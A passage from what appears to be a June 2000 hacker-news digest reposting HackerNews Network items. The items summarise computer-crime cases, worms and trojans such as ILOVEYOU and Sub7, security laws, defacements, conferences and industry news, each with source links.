Protection Act of 2000 has been posted to Cipherwar. The analysis looks at each provision of the bill and what it means. The bill was introduced in April and has been referred to the Committee on the Judiciary. Cipherwar S.2448 - Senate.gov http://cipherwar.com/news/00/s2448_hacking.htm http://rs9.loc.gov/cgi-bin/query/D?c106:3:./temp/~c10690I7Wg:: @HWA 124.0 [HNN] June 05'00 Spammer Busted For Online Tampering ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Code Kid Jason Garon, 46, of Mission Viejo, CA., has been arraigned on charges of forgery and computer tampering after using the computer systems of Max Vision, a New York state company, to send millions of email advertisements for porn sites. If convicted he could be sentenced to up to seven years in prison. The District Attorney said that this is the first case involving online forgery in the country. Associated Press - via C|Net http://news.cnet.com/news/0-1005-200-2024887.html?tag @HWA 125.0 [HNN] June 05'00 Cell Phone Viruses? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench Next generation cell phones that include programmability and internet access may become susceptible to new forms of viruses. These new viruses may reroute phone calls, record conversation, rack up huge phone bills, as well as delete data and cause general mayhem. (In reality this isn't all that far fetched but this article is just full of FUD.) Fox News http://www.foxnews.com/vtech/060100/cellvirus.sml @HWA 126.0 [HNN] June 07'00 SPAM Worm Hits Cell Phones In Spain ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Lady Sharrow Users of the Spanish cell phone company Telefonica are being hit by the Timofonica Worm. While Timofonica does not infect cell phones directly it does send annoying email messages to users. The worm is spread through conventional email and includes a rant against the state owned Telefonica monopoly. When users open the .vbs attachment it sends an email to an email-GSM gateway with a random user ID where the message is then sent to cell phones. The Register UK ZD Net MSNBC Internet News Reuters - via Yahoo Associated Press - via Nando Times http://www.theregister.co.uk http://www.zdnet.com/zdnn/stories/news/0,4586,2583104,00.html http://www.msnbc.com/news/417066.asp?cp1 http://www.internetnews.com/intl-news/article/0,2171,6_388331,00.html http://dailynews.yahoo.com/h/nm/20000606/tc/virus_phone_dc_1.html http://www.nandotimes.com/technology/story/body/0,1634,500212951-50030 0231-501656210-0,00.html @HWA 127.0 [HNN] June 07'00 MafiaBoy to Get New Charges ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse Mafiaboy was arrested for DDoS attacks on high-profile Internet sites back in February but has only been charged with the attack on CNN. Canada's crown prosecutor Louis Miville-Deschenes will now bring additional charges of the same type but for attacks against different sites. Agence France Press - via Nando Times http://www.nandotimes.com/technology/story/0,1643,500212784-500299842- 501653573-0,00.html @HWA 128.0 [HNN] June 07'00 CheckPoint Posts Temp Fix for FW-1 Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Boyd Checkpoint has posted an interim work around for the IP Fragment-driven denial of service attack announced yesterday. The work around involves a command line instruction that will disable console logging. Checkpoint FW-1 Fix BugTraq - original advisory http://www.checkpoint.com/techsupport/alerts/ipfrag_dos.html http://www.securityfocus.com/templates/archive.pike?list @HWA 129.0 [HNN] June 07'00 Air Force Blocks Access to Museum Web Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by no0ne Soldiers of Peterson Air Force Base in Colorado are not allowed to access the web site of San Francisco based Science museum Exploratorium. The reason, according to museum officials, is that they have the recipe for "bubble bomb" up on their site. Bubble bomb is an experiment in which vinegar and baking soda are mixed in a plastic bag, a chemical reaction takes place, in turn causing the bag to explode. (Kids in grade schools do this for science class, right?) Associated Press- via San Jose Mercury News http://www.mercurycenter.com/breaking/docs/016603.htm @HWA 130.0 [HNN] June 07'00 Mounties Fall Behind Crooks in Online Crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Brian Years of deep budget cuts have left the Canadian Mounties far behind the criminals when dealing with online crime. officials hope that the recent approval of $543-million in new funds will help narrow that gap. The RCMP has lost several good officers to the private sector recently but hopes to train 1,200 to 1300 new Mounties this year. National Post http://www.nationalpost.com/financialpost.asp?f @HWA 131.0 [HNN] June 08'00 Accused in ILOVEYOU virus case set free ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by weld pond The 27 year old bank employee, Reonel Ramones, suspected in the "Love Bug" virus case has been freed because there is no law in the Phillipines under which he could be prosecuted. He did nothing illegal. CNN San Jose Mercury News http://cnnfn.com/2000/06/07/worldbiz/wires/love_wg/ http://www.mercurycenter.com/svtech/news/breaking/merc/docs/020797.htm @HWA 132.0 [HNN] June 08'00 Kevin Mitnick Talks About Jobs in Computer Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by silicosis Kevin Mitnick and a range of people from the computer underground are interviewed about working in the computer security industry. CIO Magazine http://www.cio.com/archive/060100_con.html @HWA 133.0 [HNN] June 08'00 Australia passes law legalizing government computer intrusions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by apocolypse The Telecommunications (Interception) Legislation Amendment Bill 1999 was passed through Australian Parliament. The new bill aims to aid law enforcement officers investigating criminal activities and intelligence collection by the Australian Security Intelligence Organization. This latest bill adds to legislation passed last year that gave ASIO, Australia's internal security service, the right to hack into any Australian's computer. Newsbytes http://www.newsbytes.com/pubNews/00/150247.html @HWA 134.0 [HNN] June 08'00 Press allowed to cover MPAA depositions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by apocolype The Motion Picture Association of America (MPAA) loses its bid to stop public scrutiny of proceedings in a lawsuit targeting an online distributor of freely available DVD-cracking technology. Yesterday's ruling marked a victory for freedom of expression and society's access to its courts, Robin Gross an attorney with the Electronic Frontier Foundation (EFF) said today. The San Francisco- based civil liberties group is backing the defense of 2600 Magazine and is representing defendants in a similar case in California. Newsbytes Ruling via Cryptome 2600 http://www.newsbytes.com/pubNews/00/150243.html http://cryptome.org/mpaa-v-2600-spo.htm http://www.2600.com/news/2000/0608.html @HWA 135.0 [HNN] June 08'00 Vulnerability in free mail services found ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by apocolype Lycos' WhoWhere fixes a problem affecting millions of email accounts that allowed intruders to peruse email and send messages as though accounts were their own. Lycos would not say how many people have registered for the company's MailCity service, nor would they estimate how many other accounts may have been at risk or how long the bug might have existed. CNET http://news.cnet.com/news/0-1005-200-2036086.html?tag @HWA 136.0 [HNN] June 08'00 OnStar service can unlock car doors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by evenprime The OnStar system allows OnStar to call into your car and control your door locks, the horn, and the lights. Very secure and very proprietary systems protect your OnStar system from being abused by attackers. Risk Digest http://catless.ncl.ac.uk/Risks/20.90.html#subj2 @HWA 137.0 [HNN] June 09'00 Thousands of trojaned computers found ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by weld pond The Justice Department has been notified that thousands of computers have been found with trojan remote control software installed. A file which looked like a movie clip actually contained remote control software which has been dubbed the "Serbian Badman Trojan". AP http://news.excite.com/news/ap/000609/02/hacker-attack @HWA 138.0 [HNN] June 09'00 Investigative Report: Female Hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by weld pond ABC News investigates the female side of the hacker subculture. This largely male dominated world presents special chalenges to women. Scene whores, hacker hangouts, and the non-sexist elite are covered. ABC News http://abcnews.go.com/sections/tech/DailyNews/hackerwomen000609.html @HWA 139.0 [HNN] June 09'00 ISS founder is a white hat hacker ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles LinuxWorld profiles Christopher Klaus, the founder of ISS. The origins of his company and products are discussed as well as their current classes in Linux security. LinuxWorld http://www.linuxworld.com/linuxworld/lw-2000-06/f_lw-06-iss.html @HWA 140.0 [HNN] June 09'00 80,000 DNS Domain Server Vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse 80,000 domains make up about 75 percent of the domain name system (DNS) in Australia and New Zealand. Theses DNS servers are vulnerable to Denial-of-Service attacks, and 55 percent may be compromised at the root level. One security threat for vulnerable DNS systems is that a hijacker could point a site's DNS to a proxy server, capture important information, then send data back to the genuine server with the interception unnoticed. ZDNET http://www.zdnet.com.au/enterprise/security/stories/au0003277.html @HWA 141.0 [HNN] June 09'00 Lewis Koch on Winn Schwartau ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by mcintyre Lewis Koch has an opinion piece about Winn Schwartau. This quote says it all: "It's not that hackers present no real danger. In fact, we need a sober analyst of Internet reality, someone who can identify who is doing real damage and how that damage can legitimately be monitored and contained. But Schwartau, peddling his Cybershock warning of a virtual doomsday, is just another hysterical infowarrior playing to our primal burrowing instincts." Interactive Week http://www.zdnet.com/intweek/stories/columns/0,4164,2584807,00.html @HWA 142.0 [HNN] June 09'00 Television takes on computer crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by PhantasmP and Weld Pond There are be 2 upcoming shows on TV relating to computer security. The first is on A&E Networks respected Investigative Reports. The show is titled "e-terror" and airs Wed, June 14 at 10pm. The show will be an indepth look at security on the internet. People from NIPC, the military, and the L0pht will be interviewed. Investigative Reports This Saturday (May 13th) America's Most wanted is airing an episode about cyber terrorism. The write up in the print edition of TV Guide is as follows: "Examining U.S. government efforts to stop criminal computer hackers, who can disrupt vital city services." The online edition says "Cyber-Criminals Special Edition: An overview of cyber terrorism includes easy targets; wide-ranging effects; and a profile of a dangerous hacker." The show is scheduled to air at 9pm EST on FOX Networks. America's Most Wanted http://www.aande.com/tv/shows/billkurtis/irhighlights.html#e-terror http://www.amw.com/ @HWA 143.0 [HNN] June 09'00 Top 50 Security Tools Survey ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by weld pond 1200 nmap users were surveyed about their favorite security tools. Open source tools ruled the day. The survey include descriptions and pointers to the distribution sites. Fyodor's Good Reading List http://www.insecure.org/tools.html @HWA 144.0 [HNN] June 12'00 NETSEC Discovers Nothing New ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Frank Last Friday's announcement by NETSEC (Network Security Technologies) of a new DDOS tool installed on thousands of computers world wide created a lot of media attention but was really nothing new. The so called 'Serbian Badman Trojan' is nothing more than a repackaged version of Sub7, a remote administration tool similar to NetBus, that has been around for years. Sub7 is incapable of launching a DDoS attack in its current revision. NETSEC's discovery amounts to nothing more than a publicity stunt by an opportunistic security firm in quest of free advertising in the form of media attention. The UK Register ZD Net Symantec Network Associates Commandcom Late Update: 120412JUN00 NetSec has sent us an email explaining their position. NetSec Responce http://www.theregister.co.uk/content/1/11290.html http://www.zdnet.com/zdnn/stories/news/0,4586,2585554,00.html?chkpt http://www.symantec.com/avcenter/venc/data/serbian.trojan.html http://vil.nai.com/villib/dispvirus.asp?virus_k http://www.commandcom.com/virus/downtroj.html @HWA 145.0 [HNN] June 12'00 Brazilian Telephone Users Privacy Breached ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by i_l00p The personal data of millions of customers of the Brazilian telephone monopoly Telephonica, can be purchased on the street for R$10. The CD contains name, address, phone number (including unlisted numbers), and CPF number (which is similar to a social security number). Telephonica has admitted that they knew that the information was available since June of last year. Estado - Portuguese http://www.estado.com.br/editorias/2000/06/02/cid690.html @HWA 146.0 [HNN] June 12'00 Dozens of Malaysian Sites Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by mortel Attackers have broken into dozens of Malaysian political Websites, leaving government officials and opposition leaders fuming Sunday over images of rotting skulls and obscene messages. One vandal, calling himself "Xenophoria", attacked 21 pro-government Websites, posting a list of demands for greater press freedom and an end to corruption. Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/20000611/tc/malaysia_cyber_havoc_1.html @HWA 147.0 [HNN] June 12'00 Return of FidNet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Diane The General Services Administration has released a draft request for proposals on the Federal Intrusion Detection Network. It is hoped that FidNet will enable civilian agencies to react collectively to cyber attacks. The draft RFP will allow vendors to determine what they can offer now and in the future. Federal Computer Week FedCIRC - RFP FidNet http://www.fcw.com/fcw/articles/2000/0605/web-fidnet-06-08-00.asp http://www.fedcirc.gov/fidnet/SECTION%20DRFP.pdf http://www.fedcirc.gov/fidnet/ @HWA 148.0 [HNN] June 12'00 H2K Update: Movie Premier, Speaker List ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Macki Freedom Downtime, the 2600 documentary about the Free Kevin campaign is nearing completion and will premiere at H2K Friday evening (July 14). A preliminary list of speakers and panels is now available. Preregistration for the conference closes this coming Friday, 6/16/00. Hope 2000 http://www.h2k.net/ @HWA 149.0 [HNN] June 12'00 Another ILOVEYOU Variant Found ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse Just another copycat of the ILOVEYOU worm it's called Plan Columbia (aka Loveletter.AS). Most anti-virus software will detect it as part of the ILOVEYOU family and remove it. The subject line will read: US PRESIDENT AND FBI SECRETS =PLEASE VISIT = (http://WWW.SHUNSV.COM) = a random sequence of 6 uppercase letters. ZD Net (http://WWW.SHUNSV.COM) http://www.zdnet.com/zdhelp/stories/main/0,5594,2583071,00.html @HWA 150.0 [HNN] June 12'00 Radio Interferer Gets Five Years ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles Jack Gerritsen has pleaded guilty to charges of broadcasting over 1,000 obscene messages on police frequencies in the Los Angeles area. Mr. Gerritsen has been sentenced to five years in jail for his crimes. (The press labeled this guy a hacker. Yeah, it takes a lot of skill push a button and say obscene things.) Associated Press - via Union Tribune http://www.uniontribune.com/news/state/20000610-991447-radiohacker.html @HWA 151.0 [HNN] June 12'00 Indonesian Arrested in Australia For Attacking Singapore ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow An Indonesian youth has been arrested while studying in Australia for breaking into an Singaporean company. A server at Data Storage Institute, a Singapore research and development center, was attacked in March while the student was studying in Australia. The case was handled by the Computer Crime Branch of the police department. Fairfax IT http://www.it.fairfax.com.au/breaking/20000612/A61943-2000Jun12.html @HWA 152.0 [HNN] June 12'00 Evidence to Support Cell Phone Ban Now Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by martin About a year ago HNN published a story about a man who was convicted in England for using a cell phone on board a plane. HNN felt the law was less about public safety and more about airline royalties on in flight phone use. Finnally there is some actual scientific evidence that illustrates the dangers of cell phone use while in flight. The study was conducted by Britain's Civil Aviation Authority, who obviously has a vested interested in the outcome of the results. While this is definitely a step in the right direction more studies are needed. HNN Archive for July 23, 1999 New Scientist http://www.hackernews.com/arch.html?072399 http://www.newscientist.com/nsplus/insight/phones/dangersignals.html @HWA 153.0 [HNN] June 13'00 Hard Drives With Nuke Secrets Disappear ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse The US Energy Department has disclosed that two hard drives containing very sensitive nuclear information have come up missing from high security vault at the Los Alamos National Laboratory. Officials have theorized that the disappearance may be related to last months forest fires which caused an evacuation. Officials also commented that it was doubtful that espionage was involved. The two hard drives contain detailed information on how to disable nuclear weapons in the event of an emergency. C|Net MSNBC http://news.cnet.com/news/0-1003-200-2066575.html?tag http://www.msnbc.com/news/419700.asp @HWA 154.0 [HNN] June 13'00 Police Stumble onto Pirates ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse Seeking to recover stolen laptop computers, state troopers in Pennsylvania recover much more: $22 million worth of pirated Microsoft software and phony license agreements. Police collected more than 8,000 copies of Windows 98, Microsoft Office and Windows NT at the location, and over 25,000 counterfeit end-user license agreements. Wired http://www.wired.com/news/business/0,1367,36944,00.html @HWA 155.0 [HNN] June 13'00 Social Aspects of the Love Bug ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles The recent ILOVEYOU virus/worm was not unique but due to its far reaching implications and media coverage it makes an excellent example to pick apart antivirus companies, the government's preventive measures, cyber detectives, and the guesswork involved in estimating billion-dollar damages. Sun World http://www.sunworld.com/sunworldonline/swol-06-2000/swol-06-lovebug.ht ml @HWA 156.0 [HNN] June 13'00 Interview with Bruce Schneier ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Rich Noted cryptographer Bruce Schneier answers a few questions for Information Security magazine about cryptography, managed security services and just security in general. Infomation Security Magazine http://www.infosecuritymag.com/jun2000/junqa.htm @HWA 157.0 [HNN] June 13'00 IC-Crypt 128 Goes Freeware ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Tom Now available as Freeware IC-Crypt offers 128-bit encryption for ICQ users. The author has decided to make the reg code generator available for all. IC-Crypt http://www.ic-crypt.org.uk @HWA 158.0 [HNN] June 13'00 IronBox Releases New Articles ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by White Vampire Iron Box Technologies, a conglomeration of several high profile underground sites, has released several new articles. Sorting and Searching Algorithms Part 1 and 2, A Brief History Of Hacking, and A Different Language Across the Border which recommends using bilingual servers as an addition security measure. Iron Box Technologies http://www.ironboxtech.com/articles @HWA 159.0 [HNN] June 13'00 Hong Kong Government Defaced, Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse A vandal or vandals defaced a Hong Kong government Web site Sunday, forcing officials to close the site down for the second time in less than 24 hours. The government decided to temporarily shut down the Interactive Government Services Directory Web site to finally solve the problems. The attack on Sunday followed the attack on Saturday which forced administrators to take the site off line for 10 hours. The police are investigating. Agence France-Presse - via Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500214563-50030 3437-501680312-0,00.html @HWA 160.0 [HNN] June 14'00 RootFest Opens Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The Midwest's largest computer security convention opens today in St. Paul's RiverCentre. RootFest organizers estimate that as many as 1000 people may attend RootFest this year. It is hoped that the con will be broadcast in both audio and video in real time over the net. RootFest Saint Paul Pioneer Press http://www.rootfest.org/ http://www.pioneerplanet.com/yhoo/mtc_docs/020426.htm @HWA 161.0 [HNN] June 14'00 Email Hoax Panics Credit Card Holders ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by root66 Customers of Future Shop received an ominous message claiming that FutureShop customer records had been compromised and that all credit cards numbers had been lost. Fortunately this was not true. FutureShop outsources its mass mailings where someone at that unnamed company sent the false email. It is unknown if the perpetrator was an employee or someone who broke into the other company. Officials are investigating. (This really highlights the need of security between business partners. It is not enough to wall off your own little section of the net if you want to be secure and get work done.) NW Fusion http://www.nwfusion.com/news/2000/0612emailhoax.html?nf @HWA 162.0 [HNN] June 14'00 FAA Fails to Conduct Background Checks on Computer Contractors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse Thousands of outside contractors, many of them foreign nationals, have been allowed access to the Federal Aviation Administration's critical computer systems without having to undergo background checks. The FAA is taking steps to address the gaping security hole, the agency is saddled with a backlog of security checks that it doesn't expect to complete for several months. NewsBytes http://www.newsbytes.com/pubNews/00/150560.html @HWA 163.0 [HNN] June 14'00 @stake Announces Technical Advisory Board ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Space Rogue @stake has announced the formation of their Technical Advisory Board. which comprises world-renowned leaders in Internet security from the private, public and academic spheres, including Counterpane, Intel, MIT and UUNet. Strengthening @Stake's already formidable Research and Development staff, the members of the Technical Advisory Board include: Edward Appel, Ernie Brickell, Dorothy Denning, Tsvi Gal, Scott Loftesness, Michael D. O'Dell, Jeffrey I. Schiller, and Bruce Schneier. Business Wire http://www.businesswire.com/webbox/bw.061300/201650341.htm @HWA 164.0 [HNN] June 14'00 Site Forced to Hand Over User Identities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow Financial information Web site Interactive Investor was forced to hand over the names and IP addresses of contributors to its bulletin boards Sunday after receiving a court order obtained by Scoot.com. Scoot alleges the bulletin boards contained defamatory material. Civil liberties advocates have warned that the decision to force a Web site to reveal the identity of bulletin board contributors could stifle Internet free speech in Britain. ZD Net UK http://www.zdnet.co.uk/news/2000/23/ns-15965.html @HWA 165.0 [HNN] June 14'00 ITN Email Compromised ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by no0ne Thousands of people on the ITN Desktop news email distribution list received an unauthorized email that said "We are one step closer to finding you, you little f***er." Eighteen hours later ITN Sent out an email apologizing for the security breech. The Register UK http://www.theregister.co.uk/content/1/11324.html @HWA 166.0 [HNN] June 15'00 Philippine President Signs Computer Crime Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by punkis The ILOVEYOU virus/worm demonstrated the Philippines lack of legal remedies for computer crimes. Now the Philippine President has signed into law an electronic commerce bill that will hopefully fill this gap. The law will punish virus spreaders with a minimum fine of $2,350 up to a maximum commensurate with the damage caused, and can receive a jail sentence of up to three years. The Philippines have now joined Malaysia, Singapore and South Korea as countries that have specific computer crime laws on the books. Associated Press - via Boston Globe http://www.boston.com/dailynews/166/economy/Philippine_president_signs _law:.shtml @HWA 167.0 [HNN] June 15'00 MPAA vs 2600 Transcripts Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Macki The court has finally released the recent depositions of MPAA Chief Jack Valenti (taken on 6/6), the two-day deposition of MPAA Anti-Piracy Chief Kenneth Jacobsen (taken on 5/17 and 5/18), as well as the transcripts of last week's hearing on public access to these and other depositions (held on 6/6) and the hearing on discovery issues (held on 6/8). Future documents and transcripts will posted as soon as they become available. Audio and Video transcripts of the Valenti deposition will hopefully be posted soon. 2600.com http://www.2600.com/ @HWA 168.0 [HNN] June 15'00 Raytheon Unveils SilentRunner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench Defense contractor Raytheon Co. yesterday unveiled "SilentRunner", what it calls the vanguard of network monitoring. At $65,000 a pop the software is designed to monitor internal network traffic to analyze communications patterns to detect when proprietary information is leaving the company. Associated Press - via Nando Times http://www.techserver.com/noframes/story/0,2294,500216198-500306527-50 1702299-0,00.html @HWA 169.0 [HNN] June 15'00 30 year Old Security Report Still Useful ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by maggie d A report published by the Rand Corporation in 1970 for the Advanced Research Projects Agency was declassified in 1975. The report, entitled Security Controls for Computer Systems, details appropriate computer security safeguards that would protect classified information in multi-access, resource-sharing computer systems. While written in 1970 and declassified in 1975 this document still has valuable comprehensive information regarding networked multi user machines. (Even with more and more technology the basic security principals still apply. People just keep making the same mistakes.) Linux Security http://www.linuxsecurity.com/resource_files/documentation/R609.1.html @HWA 170.0 [HNN] June 15'00 15 yr old Receives Classified Documents ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Maggie and Apocalyse Dow Claire McDonald, 15, of Devon, England, has been receiving e-mails for the past six months that she believed came from the Pentagon in the United States. Over 250 emails in all that contain classified information where mailed from Royal Navy Commander Jim Dale intended for RNC Jamie Hay. Dale, who works in the US at the Pentagon, was contacted by the girl when she started receiving the emails. He told her to contact her ISP and continued to send the classified information. Fairfax IT http://www.it.fairfax.com.au/breaking/20000615/A8896-2000Jun15.html @HWA 171.0 [HNN] June 15'00 Underground Tools ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by rfp Network Computing magazine takes a stab at describing some of the more popular tools used by the underground. Network Computing http://www.nwc.com/1110/1110ws1.html @HWA 172.0 [HNN] June 16'00 Political Candidates Deface Web Pages ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Crystal It started when Democratic candidate Maria Cantwell's campaign workers linked to a picture of their opponent, Sen. Slade Gorton, R-Wash., in a very humorous pose on their web site. The Cantwell camp evidently only linked to the photo on the Gorton site. Workers for Sen. Gorton then changed the picture to something more flattering. Now Gorton's campaign is accusing Cantwell, a dot-com executive, of stealing intellectual capital, high-tech hacking and hijacking his server. (Linking to a picture is now considered stealing intellectual capital? Yeah, I want this guy in office.) Seattle Times http://archives.seattletimes.com/cgi-bin/texis/web/vortex/display?slug @HWA 173.0 [HNN] June 16'00 Mitnick Seeks to Renew Ham License ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Vapor An entry in the June 7, 2000 FCC Enforcement Logs show that Kevin Mitnick (N6NHG) & his legal counsel are in the process of renewing his General Class Ham radio license. Kevin's attorney, R. Gregory Adlin, argues that ham radio operation will not violate his parole conditions. FCC Special Counsel for Amateur Radio Enforcement Riley Hollingsworth states that Mitnick's current license remains valid while he and his lawyer gather documentation to prove that operating ham radios will not violate his parole. ARRL http://www.arrl.org/news/enforcement_logs/2000/0607.html @HWA 174.0 [HNN] June 16'00 Value of Microsoft Trash On the Rise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by McIntyre Not really sure what to make of this story or what is exactly going on but it seems that someone is trying to buy the unshredded trash of the Association for Competitive Technology (ACT) which is closely aligned with Microsoft. In an unrelated incident Microsoft's Dupont offices were broken into earlier this week but nothing was found missing. Wired Wall Street Journal http://www.wired.com/news/politics/0,1283,37022,00.html http://interactive.wsj.com/articles/SB961105810825579561.htm @HWA 175.0 [HNN] June 16'00 China Sentences Man to Death ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow Fang Yong embezzled about 1.66m yuan (about 200,000 US dollars) of public money from the The Bank of Communications of China, by counterfeiting bank paper, and transferring money from people's accounts from May to August 1990. The 36-year old "hacker" was sentenced to death here recently by the Ningbo Intermediate Court in East China's Zhejiang Province. This is the most severe punishment that a Chinese judicial organization has given to a "cyber criminal". (Hacker? Cyber Criminal? Lets try Forger and Embezzler, those words are much more descriptive. Oh, but they aren't as sensationalistic, sorry.) BBC - via Lexis-Nexis http://web.lexis-nexis.com/more/cahners-chicago/11407/5955809/4 @HWA 176.0 [HNN] June 16'00 OpenBSD 2.7 Now Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by White Vampire OpenBSD 2.7 has been released. OpenBSD has gone three years without a remote vulnerability in the default installation and two years without a localhost vulnerability in the default installation. This is arguably the most secure operating system available. And guess what? Its free. Open BSD http://www.openbsd.org/27.html @HWA 177.0 [HNN] June 16'00 RootFest Ends Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Code Kid The last day of RootFest, the largest security convention in the Midwest ends today. Live Audio and Video is available. RootFest St. Paul Pioneer Press http://www.rootfest.org/ http://www.pioneerplanet.com/yhoo/mtc_docs/027786.htm @HWA 178.0 [HNN] June 16'00 White Paper: Internet Identity Theft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalyse Dow The Software and Information Industry Association, a trade group representing more than 1,000 high-tech companies have released a white paper that details how consumers can prevent identity theft in cyber space. It is hoped that informing the public will help prevent cyber fraud, misused card numbers, and improve consumer confidence in shopping online. ZD Net Internet Identity Theft: A Tragedy For Victims http://www.zdnet.com/zdnn/stories/news/0,4586,2588919,00.html http://www.siia.net/sharedcontent/divisions/ebus/id_theft.pdf @HWA 179.0 [HNN] June 16'00 New Ezines ~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by syztrix and Cyber0ptix We forgot to mention it earlier but b0g has released its fifth issue. Also just released is issue 4 of 0blivion Mag. B0g 0blivion http://www.b0g.org http://www.0blivion.org @HWA 180.0 [HNN] June 19'00 AOL Confirms Compromise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by mortel America Online confirmed Friday that some of their employee accounts have been compromised by attackers, and that the accounts were used to gain access to and view details of some personal user accounts. This was accomplished via a trojan that was placed on AOL employees machines. (This is not the first time AOL had been compromised, its 